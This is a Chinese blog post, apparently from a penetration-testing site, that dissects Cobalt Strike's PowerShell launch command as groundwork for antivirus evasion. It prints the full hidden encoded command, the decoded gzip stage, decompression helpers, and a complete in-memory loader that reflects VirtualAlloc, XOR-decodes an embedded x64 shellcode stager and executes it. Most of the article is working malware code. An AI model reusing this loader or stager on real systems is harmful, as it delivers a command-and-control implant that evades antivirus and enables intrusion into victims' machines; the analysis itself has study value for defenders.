1. 首页
  2. 渗透测试

powershell免杀(cs powershell command解析)

前言

花了几天研究了一下powershell的免杀,网上很少有动手分析并免杀的文章,大部分都是搬运工+利用一些工具免杀,所以决定记录一下学习和分析的过程并分享出来,一方面加深理解一方面提供给同样有需要的人。

# 系统环境信息
cs3.14 (3.14与3.13中的payload不同)
kali2019
win10

# 杀软信息
卡巴斯基(最新)
360(最新)
virustotal(在线静态查杀)

# 语言
powershell

文章涉及的技术并不深,只是本人在学习powerhshell免杀过程中的记录,文章的内容将涉及到powershell版的loader、远程加载shellcode、利用powershell无文件落地上线cs以及最终自动化ps客户端。不会再复述powershell的基础知识,过程中需要理解的部分,我会尽可能言简意赅。

声明: 文章内容仅供网络安全爱好者学习使用,请勿用文章中提到的技术或工具做违法的事情,否则后果自负。


理解cs powershell command

直接利用cs生成powershell command上线命令。

powershell免杀(cs powershell command解析)

内容如下:

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADIALwBpAE8AaAByACsAMwBQADYASwBmAEIAZwBKAEUASgBTAEcAYwBEACsAcgBrAFEANgBRAEIARQBJAGcAUQBNAEsAOQBwADYAcABNAFkAcwBBAGgAVgB5AGMATwBDAFcAZgBuAHYANgA4AFQAbwBOAFAAWgA2AGUAeQBPAHQARgB1AHAAdwBvADcAZgB5ACsAUABuAHYAZgBqAFYAWQBQAGkAawBoAFIAagBwADQAZABnADEASQBQAE8AMABoAEQAaABBAHIAcwBOAHcAagA0ADkANwA0AHUAaABoAHUAawA0AFgAYgB3AGMAWQB2AG4AbgBZADEAZAArAEEAWQBXAEEAWQBCAE0AegBmAGoAdwA5AFQAZwBJAEgATgA1AEwAOQBFAEEATAAvAFoAcgBrAEUAcwBXAEcASwB5AFQAUwBvAEkARABZAEoAaAA0AGUASABoADgAUwBIADcAUgBKAHcAQQA3AE8ARwBiAEEAMABJAFUAdwBUAGMAYgBoAGsAZgBYAEMASgBpAHYAVABQADYAbAA0ADMAbQA4AGEAdwBQAGsAdgBQADcAeABSADQAOQBnAEQASgAzAHcAdQBpAC8AMwBZAGQAZwBKAEEAbQBqAHYATABBAFMARABmAEkASAA1AEoANwBNADYAUQBnAHkAZgBKAGoAcwBUADYAaQBIAHoATgAvAFAAbAByAGQAeQAzADMAQgAyAHcAYgBtAEoASgBEACsAaABIAGUAbwB1AE8AWQA2AFIAbgBJADEAYwBIADYAUQAzAEsAbQBtAGUAaABNAEoALwA3ADYANgA5AGMANABlAFcAcAA4AGwAbwBXAGYAQQBLAHMASQBKAC8AVABrAGkAQwBFAGQAdABtAHcAcgBGAHkAQgArAFYAWgBJAEgAYwA0AFQARAArAFoAegBZADYAUgBqAE4AMwBEADMAWQBYAG0ARgBuAEMAcABYAFgAbQBUAG8AbABRAHoAOAArAEkAbwA5AFYANwBqAGQANwBPAEEAQgBlAG8AOQBmAFgAegBLADEAZQB0AFgASgA1ACsAaAB5AFMAcgBuAHAAWABEAG4ATQBsAFoAaQBYADEATgAvAEwANgB5AHYAegA1AHoAcwBhAGwAVABnAGgAcwBtAEYAWgBjAGsASwBJAFgAVQArAEQATwBFAEkANgBEAE0AbwBEADQAQgBnAFcAVgBPAEcAZQBxAHUAVQBDAEcAagBQAG4AawBDAHQAUQBFAEIAaQBHAEIARAB2AE0ASABRAHYAVgBpADkAdwBUAHoASAA5AHgAaQBHAFcAVgBxAE4AMgBYADMANwBYADcAbQBsAGYAZwArAFUANwB1ADcAeQByAGwAUAB5AHAAUgBxAFcAbQBJAEMANgBWAGIAVAB2AHcATwBIAGUATQBzAGIANgA3AG0ANgBIAFYAKwBRAHYAOABoAHUAUQByADAANwA2AGMARQBLAHoAeAArACsAeQB4AFYARABXAGoAQgBBAHcAagBoAFcAMABqADUALwBaAEMAcgBqAHcAOABQAEwAOQBrAFMAMAB2AHYAawBwADIANgBBAE0AcgAyAHYARABGAHQAaQB4AGgAUQBFAEMARgAyAGMAcABPAEcAYwBZAHcASQBMAHIAOQAvAGoAYwAzAFYANwAxAHcAeABLAHYAegBSAFUAdQBXAHYAZABkAEsANwBoAHUAZQBMADQAeQByAHcAcwBYAFcAUwA4AFAAagA0AFUASABtAC8AWgBrADMANQAvADIAeABGAGsARwBSAEMAbgA1ADcAKwB1AEIAaAA3AHUAawBRAFAANQB4AEEARQAyADAAdQA4AEoAbgAvADgAcwBaAG4AQgB2AHcAWQB5AFAAOABsADEATQBvAFQAagB6AHUAZABzAEIATgBQAGcAYgBPADcAbQBVADAASgBlAGYAMQBRAFEAYgBoAGUAKwA2ADMAUwB1ADQAagBrADcAagBIAGwAQgBVAE4AQwBVAEsAUAA0AEsANQB4AGoAQwBmAGsANQB3AHgAdABDAGwALwAxAHoAMQBOADAAeQA5ADcAVwBtAGIAdwBMAG4AMAByAHIAZQBUAHUAUABkADIAbgB1AGQAeQB6AFEAQgBDAFUAbQBDAG0AaABkAGEANgBYAEcAQQAwAEMAQwB4AG8AbABwAHUATQBFADYASABiAFUASQBhAEcAYgBMAFgAUABmADQAWQA2AEoARgBTAEkAZABCAE8ASABkADMARwB2AGgARQAwAHAAdgByAG4AdQB1AFEAeQB1AEcANgBEAFMANgBsAEkAYQA1ADUAawBFAGQAQQBTAHQAbABwAGMAUQBNAGsAQQBHADcAaQBZAFkATwBkAHcAaQA1AFQAegBuAHAAQQBjAHUAaQBKAFUAYwB0AFIAVABRAG0AOQBFAHYASwBoAFIAYQBtAE8AWQBPAE4AMAByAC8AbgBSADYARwBzAHcAVgBDAHkAUABRAHYAYQBWAEQAcgByAFEAcQBJAEYARAByAFQAbgAzAEMAbwBxAFMAegBkAHcAZwBFAGIAdQBQADgAQwArADEAOABtADEASwBGAEsAdQA3AGkAUgA5AEEARQAwAFQAUQBMAFAAYwBzAE0AUQBzAEUAUQA1AHAAWAA4AHUAVgBmAGsAcQA4AC8AdwAzAGUAagB5ADMAbQBCADUAZwA5AEQARwArAEIAegBHAGUARgBLAE8AMQBwAFEANwA5ADIAQQBjAHAATwBnAEMANgAwAEcAVQBPAGYAYQBSAFgAUwBFAG4AegBwAEoAbQBGAGEAUwA1AGsAWgBQAFgAMQB1AHYAcgA0AFQAbgBkAEcASwBRADYAbwBrAFkAdABmAHUAZwBnAEEAMgBhAGwAcgBXADQALwBLADUASwBrAGMATwBjAFgAcwA2AGEAaQBSAGoAVQArAEsARwB5AGMAWgBSAFkAdAAxAFoAWQBpAEUAUwArADYAQgB4AGoARwBjAGMAYwBmAFYANQBpAFAAMgBCAHcATgBPADkAcQBuAE4AQgBZAFAAVQB0AGIAMwBjAGMAKwBTAEEAZQBtAFcAYgBjADcAcQAwAFQAWQBkAHIAaABSAHEAaQBCADYAawBnAGkAbwArADcARgBFAFoARgB1AFUANwAzAFoAeABOADIAbwBiAFMAeABGAGkAdQBoAGEAUQBWAFAAdQBpAGEAcwBGAFEASwBhAGYAKwBTAEoAMgByAFcASQBJAEkAQgBsAGQAOQBNAFkAUgBUAHoAagBvAGIAcwA2AEsATAAwAFgAVABqAHIARwBLADkASQBZAHQAdQAyAEkAagBwAEwAcABMAEkAaABBAFAAQwAyAFEAeQAzAFoAQwBSAFAANwBJAGwAVgBEAHQARwAvAEQASQBjAFIAbABLAC8ATgBaAEMANQBEAFcAaABaAHUAeQBiAE0AOQBBADAALwA5AGIAWAB4AEQAeABGAEkAOQA1AGQAMgB1AGsAZAArAEQAKwBMAFUAegA0AGEAeQBEADYAdQBWAEIAbAB3AE4AbQB4AHYASABRADMAQgBGAEQAcABlAHoAZwBuAFQAagB3AGsATgB1AFMATAA4AFQAZAA2AHgANwBRAFYAVwA1ADYAUAB2AFQAeQBRAFIAZQBaAGEARwBkAEsAdgBKADgAcwBWADEAVABiAGkAcgBBAHgAKwBLAHUAZwBiAFcATgBaADAAWABMAHoAdQBKAFUAbgBXADUAeABoAGkAMABTAEsAVQBZAGwAeABZAGwAMABiAG4AagBaAGUASwBlAHQAcwBmAFMARgA2AG4AUQBuAEwAUQBZAFcAOQBzAGsAUQAyAFkAMQBOAFgAVQBwAHUATQB2AFkAdwAwAGIAUQB1AC8AWgBXADMAaAB1AHkAMwA2AHMAYQBGAFMAdwBaAGUARABUAFEAdwBvAHAAegBHADEARQA4AHoANQBWAGQAZgBCAEsAYQAwAG0AagBqADYAVwBrAFMAMgBmAHUAUgA0ADEAZABUAGIATgB2AEgAcgBGAEgAZAB0AG8AQQB6AGwAZABZAHoAOQBjAEkAagA5AHkAUABMAHIAawA2AG0AZQA0AHMANwAwAFUAdgBsAFoAegBaAHAAVQBxAEwAeQAvAE0AMABjAHkASwBFAHAAbwBiAEkATAAyAEoAUgBqAEoATQBFAHIAWAB5AFoAUwBYADQAMABRAHkAcABSAGIAcABwAG4AcQA4ADIARgBsAHQAbABoADIAegBNAFMASABWAFUAMQB5AGQAUABEAGYAMwBnAFcAZwBxAFoATABPAFYASgBmAEcARQB1AGIAWABmAFkAZQAzAEwAcwBIAFUATwBsADYAMABpAFgATQBmAFIAMwBFAGUASwAyAC8AWgBiAHIAZABtADYAbQBGAFIANQBwAHcAdQBGADYAWgBiAG4ATwBMAEQAdgBDADcAeQBsAHEANQBkADkAcwBMAEgAdABqAHQANQB1AHkALwBIAGwAZQBkAHQAawBkAFEAbQBUAHgAbQB5AHAASwBkAHgAQwAyAEsAcQA4AFAAUgBUAFUAVQAyAFgAZABuAHkAbABrAEwAbAByAHkAbgBHADMAMwArAE8ANQBHAEUAYwA3AGoAMABVAHkASQBKAHcAdAAyAHUATgBaAE8ANABsAFEAOQBIAHYAaQBkADAALwBXADMAaAA3AEUAbQBuAE4AbAA1AHYANgBPAHcATgBDAGEARAB1AGEAagBPAE8AbAB5AGwAMgBvAGsAWABpAHEAQQBlAGUASwBNAGkAeQBpAHEANwBWAFoAYgBuADgANQBKAFgAeAAvAEkASQBuAFUAeABwADUAcAA4AFAAegBjAFcANgB2AGsASwBOAFMAUABTAHEAZgBsAFcAYQBTAEMAZABEAGkARwBlAG8ATwBrAC8ASQA0AEYAagBuAGQAcwB0AEsAcABkAFYAcgBGAEUAKwBEAHgASgA3ADIAWgBLAHYAQgB0AFYAaQBXAE4AeQB6AEMANwA3ADMAeABNAFcARwBSAGEANAB3AFAAbwAyAEoAVQBXADgAYgA4AHgARgA4ADgAQwAxAHYAYwAyADcAUwAwAFgAWgBlAG4AbgBUAEgAeABjAEcAdAAxAFoAdQB2AHMAVgBKADEAdwBSAFUAZQBpAFQATwA2AFAANgBwAGwATgBMAEwAeABlAEIANQBJAHYAMQAxAHQANABZAHkAYQBjADMAdgBDADYAdgBTAG4AaABhAFMAcwB4AGQAMQBQAGIAMwBpAGIAaQBrAEIATQA5AGQAUwBYAFYAbABOAEcAUQBrAGsAWABrAHMAZQBBAFAATwBPAEoAMwA3AGUATgA2AFoAQgA3AHEAdABjAHAAUgBPAFoAcgBMAFYAaAB6AFUATwAxAFAAdQB1AFEALwBYAEUAVgBHADUARwBuADkARwB4AGYAVQB4AHgARABPAGgATwA1AG4AcgB6AC8AMQBMAHYAOABNADIANwBHAE8AYgBkAG8AUQBEAFoANQArADcAYwBMADEAbwBxAGYAdwBwADUASQBKADYAUgBmAEEAaABSAHMAVgBZAHIAZwB3AG4AUgBOAEYARQBsAGwAVwBsAHkAeQBVADgAcQBSAEsANwBoAGsAMQB5AGsASgBLAHUAQgBsAFQAeAB1AGYAMQBjAEoAZgBXAFcAYQAyADYAOAA2AHQAeAB5AHgAYwBvADEAcAAvADAAdAB6AFYAVgBhAG8ALwBKAE8AdQBxAFMAMQBLAG8ATgBOAFYAcgBQAHkARgB0AGEATQBjAHgAeABlAE8ATgBEAHMAbgB2AFUAKwA4AFcAUAA2AHoAOQBLAGMATABLADYAbwA3AEQAbQBWADgAWAAyAE8ANQB2AFYANAB0AC8ATABQAE4ASwA5AEIAZwAzAGMANgBqAFoAMgA1AHIAQwA5AEYAdgA2AGQAaQBpAGYAUgBvADMAZQA5AFkAVwBBADIAYgBJAE4AbQBZAEUAcgBXAHIARgAvAGwAUgBwAEQAVAAxAGEAbABjAEMAdwBvAHoAVgBSAEQAVgBRAGgASwA2AGsAQwBFAGQAWABTADgAKwBsAEoAUABpAGEAdABjAHEAOQBpACsAbgAwAEUANgBjAFQAeABUADgAWQArAHYAdABrAGgAYwB4ADcAdwA2AE4AdABqAHIAYgBYADkASAB1AHgAbQBMAFgARQBoAC8AZQBqAGwAeQAvAHgANgAzADIATQBmAE4AOAAvADcAVwBKAHEAcgBsAHAALwBmAFAAaAAyAG4AeABjAGkAOABLAEYAcgAvAG0AbwA2AEcAdwBNAGMASABJAEYARgB1AHkAbQBkAHMATwA3AHYAbwArAGgAaQA4AFQAWQBuAFQAVgAyAFUAYQB1AFQAegBuADQALwAyAEoANABnAGQAYQBOAEcAeABsAHcANwBHADkAMQBlAGwAWQAxAG0AdQBuAGsANQAyAHYAeABpAHgALwBuAHoAdgArAC8AVAAxAFgATgBCAGwAbABmAHQAMABWAGYAagArAFEAQgBRAEsAOQA2AGQAdgBSAC8AYgA3AGIAUAB5ADUAWABmAEUAKwBCAFgANQAvAFMAcgBiADAAZgBxAFUAUABSAEkANgBnAGMAdwBpAFAASgBZAGEATgBxAHkAegBMAHAAcgA4ADEAbABsAHIANwBmAFcASgA2AHIAcABmAGsAMwArADIAVgAwAHYAbgB2AEEANQBTAFAAcgBxAHoATQAxAGYAdgBBAGgAbwBsAGoAdwAvADkAagBEAEgANwB3ACsAdAAvAFoAVABmAG4ATABaAHMAagB2ADcARwBXAEkAUABxAGMAcwBmAFoAVAAvAEIAYwA1AEsAegBMAHYAagBEAFEAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

这是cs的无文件落地上线形式,利用powershell直接将shellcode加载进内存执行。逐步的分析这条命令。

  • -nop => not profile 不加载powershell配置文件
  • -w hidden => 隐藏窗口
  • -encodedcommand => 将base64后的字符串当作powershell命令执行

解码encodedcommand后面的字符串,来看一下这条命令具体都干了啥。

powershell免杀(cs powershell command解析)

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

通过代码可以看出,首先将字符串base64节码后,再进行解压缩操作。很容易理解,利用压缩的方式减小了payload的体积,同时又起到了加密混淆的作用。

  • [System.Convert]::FromBase64String .NET方法,将bas64字符串还原为字节数组
  • Syetem.IO.Compression.GzipStream .NET方法,对流进行压缩/解压缩

这里我提供两种办法获取到这段base64的源代码。

  1. 通过python gzip库解压缩
  2. 通过powershell解压缩(推荐)
# powershell

$data = [System.Convert]::FromBase64String("CompressedBase64StreamHere")
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
$sr.ReadToEnd()
# python

import base64

b64 = ""
byte = base64.b64decode(b64)

infile = open('p.zip', 'wb')
infile.write(byte)
infile.close()
# 最终代码

Set-StrictMode -Version 2

function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )

    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

    return $var_type_builder.CreateType()
}

If ([IntPtr]::size -eq 8) {
    [Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbIUHlrquJim6Y5IyNuEupicmJySSBicmKZdKq85dz2yHp4a6riaxLxaqr7bhLqcUsjIWOncXFimch2DRjc9muq5Wug4HNJKXxrqtJrqvlq5OPc3NzcbhLqcXFimQ4lO1jc9qbjLKa+IiMja9zsLKevIiMjyPDKxyIjI8uB3NzcDFAWYVAj6Ou3kx3O/7fsFjNuYZKIFkr2XqA0mzJ8wtV8+eXxvTqiNo9q88QX+y3DnBeEPZD22afGEDlcRzfsYmmAc99Kxz/Z70cIru6QVSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMSEw0TGAN0Sk1HTFRQA213AxUNERgDd1FKR0ZNVwwVDRMKLikjIQqwg7UX5Wi6vFp3q3IOIkdExQi3TyuHh52bV118C6+kHymPCKl62800DdluDfpMhy0iodMgL+v4VxDOqU/EZrCY8SbBDDelypr8Ww050PRO2+nIuB3fhRw0ylrXXsIqK58rYjy2c6pBCPuDwSljbPmmZyFJ2FpRWI4NLJDlcuKMEqH2uqBmhXLjg541hNhjV8xs5AP2/GeXvuR24Dwi+XhtrQEBOTc/GzGA06mh9Ptrg2mwBeXU8RDkt2s51Eqeri+xK1JOuNSF00RIzztkRI0Xe7ugIyBSaRF/9/3u58ojYp3TloF13PZrEuqZIyNjI2KbIzMjI2KaYyMjI2KZe4dwxtz2a7BwcGuqxGuq0muq+WKbIwMjI2qq2mKZMbWqwdz2a6DnA6bjV5VFqCRrIuCm41b0e3t7ayYjIyMjc+DLvN7c3BIaEQ0SFRsNEBINEhoSIyMjIys=')

    for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
    }

    $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
    $var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

    $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
    $var_runme.Invoke([IntPtr]::Zero)
}

上面的代码就是cs的powershell上线command最终执行的操作了,简单理解一下就是$var_code获取到了从bin1源文件中读取的经过base64编码后的字节数组(xor 35后的字节数组)后,通过亦或还原原shellcode并申请内存,在内存中执行shellcode。


结束语

至此cs的payload就分析完了,如果只是想知道经过base64和压缩后的内容,完全不需要这个分析过程,通过cs直接生成powershell文件即可。之所以分析的清楚,是为了后面免杀的过程中更容易操作和修改。

参考

powershell压缩/解压缩数据流

cs payload分析+bypass


  1. bin文件实际为二进制文件,可以通过[System.BitConverter]::ToString($byetsarray),将bin文件读取的字节数组转换为16进制,会发现就是shellcode。 ↩︎

原创文章,作者:s1ye,未经授权禁止转载!如若转载,请联系作者:s1ye

联系我们

在线咨询:点击这里给我发消息

QR code